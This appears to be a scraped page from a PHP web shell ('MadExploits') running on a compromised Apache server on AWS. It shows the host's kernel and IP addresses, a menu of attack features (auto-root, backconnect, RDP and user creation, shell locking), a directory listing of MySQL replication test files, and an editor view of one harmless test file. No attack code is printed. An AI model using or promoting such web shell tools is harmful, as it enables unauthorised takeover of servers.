Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.221.248.199
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
rpl_ndb /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
check_conversions.inc
914
B
-rw-r--r--
disabled.def
1.07
KB
-rw-r--r--
rpl_ndb_UUID.test
592
B
-rw-r--r--
rpl_ndb_blob2.test
549
B
-rw-r--r--
rpl_ndb_ddl.test
1.6
KB
-rw-r--r--
rpl_ndb_delete_nowhere.test
545
B
-rw-r--r--
rpl_ndb_extra_col_master.test
727
B
-rw-r--r--
rpl_ndb_extra_col_slave.test
753
B
-rw-r--r--
rpl_ndb_func003.test
662
B
-rw-r--r--
rpl_ndb_insert_ignore.test
535
B
-rw-r--r--
rpl_ndb_mixed_implicit_commit_...
658
B
-rw-r--r--
rpl_ndb_multi_update2.test
805
B
-rw-r--r--
rpl_ndb_multi_update3.test
620
B
-rw-r--r--
rpl_ndb_not_null.test
417
B
-rw-r--r--
rpl_ndb_relayrotate.test
618
B
-rw-r--r--
rpl_ndb_row_001.test
540
B
-rw-r--r--
rpl_ndb_row_basic.test
444
B
-rw-r--r--
rpl_ndb_row_implicit_commit_bi...
617
B
-rw-r--r--
rpl_ndb_set_null.test
424
B
-rw-r--r--
rpl_ndb_sp003.test
583
B
-rw-r--r--
rpl_ndb_sp006.test
583
B
-rw-r--r--
rpl_ndb_trig004.test
929
B
-rw-r--r--
rpl_ndb_typeconv_all.test
1.75
KB
-rw-r--r--
rpl_ndb_typeconv_lossy.test
1.75
KB
-rw-r--r--
rpl_ndb_typeconv_nonlossy.test
1.76
KB
-rw-r--r--
rpl_ndb_typeconv_strict.test
1.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpl_ndb_ddl.test
# The include statement below is a temp one for tests that are yet to #be ported to run with InnoDB, #but needs to be kept for tests that would need MyISAM in future. --source include/force_myisam_default.inc #################### rpl_ndb_ddl.test ######################## # # # DDL statements (sometimes with implicit COMMIT) executed # # by the master and it's propagation into the slave # # # ############################################################## # # NOTE, PLEASE BE CAREFUL, WHEN MODIFYING THE TESTS !! # # 1. !All! objects to be dropped, renamed, altered ... must be created # in AUTOCOMMIT= 1 mode before AUTOCOMMIT is set to 0 and the test # sequences start. # # 2. Never use a test object, which was direct or indirect affected by a # preceding test sequence again. # Except table d1.t1 where ONLY DML is allowed. # # If one preceding test sequence hits a (sometimes not good visible, # because the sql error code of the statement might be 0) bug # and these rules are ignored, a following test sequence might earn ugly # effects like failing 'sync_slave_with_master', crashes of the slave or # abort of the test case etc.. # --source include/have_ndb.inc --source include/have_binlog_format_mixed_or_row.inc --source include/master-slave.inc let $engine_type= NDB; let $temp_engine_type= MEMORY; let $show_binlog = 0; let $manipulate = 0; -- source extra/rpl_tests/rpl_ddl.test --source include/rpl_end.inc
Close